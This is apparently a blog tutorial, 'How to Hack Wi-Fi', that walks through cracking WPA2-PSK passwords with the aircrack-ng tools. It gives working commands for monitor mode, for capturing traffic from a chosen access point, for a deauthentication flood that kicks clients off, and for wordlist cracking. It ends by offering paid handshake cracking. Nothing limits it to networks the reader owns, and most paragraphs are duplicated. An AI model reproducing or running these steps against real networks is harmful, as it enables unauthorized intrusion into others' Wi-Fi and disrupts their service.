How to Hack Wi-Fi: Cracking WPA2-PSK Passwords Using Aircrack-Ng
The weakness in the WPA2-PSK system is that the encrypted password is shared in what is known as the 4-way handshake. When a client authenticates to the access point (AP), the client and the AP go through a 4-step process to authenticate the user to the AP. If we can grab the password at that time, we can then attempt to crack it.
The weakness in the WPA2-PSK system is that the encrypted password is shared in what is known as the 4-way handshake. When a client authenticates to the access point (AP), the client and the AP go through a 4-step process to authenticate the user to the AP. If we can grab the password at that time, we can then attempt to crack it.
Step 1: Put Wi-Fi Adapter in Monitor Mode with Airmon-Ng
- airmon-ng start wlan0
- airmon-ng start wlan0
Step 2: Capture Traffic with Airodump-Ng
Now that our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air. We can grab that traffic by simply using the airodump-ng command
This command grabs all the traffic that your wireless adapter can see and displays critical information about it, including the BSSID (the MAC address of the AP), power, number of beacon frames, number of data frames, channel, speed, encryption (if any), and finally, the ESSID (what most of us refer to as the SSID). Let's do this by typing:
- airodump-ng mon0
Now that our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air. We can grab that traffic by simply using the airodump-ng command
This command grabs all the traffic that your wireless adapter can see and displays critical information about it, including the BSSID (the MAC address of the AP), power, number of beacon frames, number of data frames, channel, speed, encryption (if any), and finally, the ESSID (what most of us refer to as the SSID). Let's do this by typing:
- airodump-ng mon0
Step 3: Focus Airodump-Ng on One AP on One Channel
- airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write WPAcrack mon0
- 08:86:30:74:22:76 is the BSSID of the AP
- -c 6 is the channel the AP is operating on
- WPAcrack is the file you want to write to
- mon0 is the monitoring wireless adapter*
- airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write WPAcrack mon0
- 08:86:30:74:22:76 is the BSSID of the AP
- -c 6 is the channel the AP is operating on
- WPAcrack is the file you want to write to
- mon0 is the monitoring wireless adapter*
Step 4: Aireplay-Ng Deauth
In order to capture the encrypted password, we need to have the client authenticate against the AP. If they're already authenticated, we can de-authenticate them (kick them off) and their system will automatically re-authenticate, whereby we can grab their encrypted password in the process. Let's open another terminal and type:
- aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0
- 100 is the number of de-authenticate frames you want to send
- 08:86:30:74:22:76 is the BSSID of the AP
- mon0 is the monitoring wireless adapte
In order to capture the encrypted password, we need to have the client authenticate against the AP. If they're already authenticated, we can de-authenticate them (kick them off) and their system will automatically re-authenticate, whereby we can grab their encrypted password in the process. Let's open another terminal and type:
- aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0
- 100 is the number of de-authenticate frames you want to send
- 08:86:30:74:22:76 is the BSSID of the AP
- mon0 is the monitoring wireless adapte
Step 5: Capture the Handshake
Step 6: Let's Aircrack-Ng That Password!
Now that we have the encrypted password in our file WPAcrack, we can run that file against aircrack-ng using a password file of our choice. Remember that this type of attack is only as good as your password file. I'll be using the default password list included with aircrack-ng on BackTrack or you can download from here (download)
We'll now attempt to crack the password by opening another terminal and typing:
- aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de
- WPAcrack-01.cap is the name of the file we wrote to in the airodump-ng command
- /pentest/passwords/wordlist/darkc0de is the absolute path to your password file
Now that we have the encrypted password in our file WPAcrack, we can run that file against aircrack-ng using a password file of our choice. Remember that this type of attack is only as good as your password file. I'll be using the default password list included with aircrack-ng on BackTrack or you can download from here (download)
We'll now attempt to crack the password by opening another terminal and typing:
- aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de
- WPAcrack-01.cap is the name of the file we wrote to in the airodump-ng command
- /pentest/passwords/wordlist/darkc0de is the absolute path to your password file
How Long Will It Take?
This process can be relatively slow and tedious. Depending upon the length of your password list, you could be waiting a few minutes to a few days. On my dual core 2.8 gig Intel processor, it's capable of testing a little over 500 passwords per second. That works out to about 1.8 million passwords per hour. Your results will vary.
When the password is found, it'll appear on your screen. Remember, the password file is critical. Try the default password file first and if it's not successful, advance to a larger, more complete password file such as one of these.
If you cant crack the handshake file then send it to us we crack it for only 10$
This process can be relatively slow and tedious. Depending upon the length of your password list, you could be waiting a few minutes to a few days. On my dual core 2.8 gig Intel processor, it's capable of testing a little over 500 passwords per second. That works out to about 1.8 million passwords per hour. Your results will vary.
When the password is found, it'll appear on your screen. Remember, the password file is critical. Try the default password file first and if it's not successful, advance to a larger, more complete password file such as one of these.
If you cant crack the handshake file then send it to us we crack it for only 10$
No comments:
Post a Comment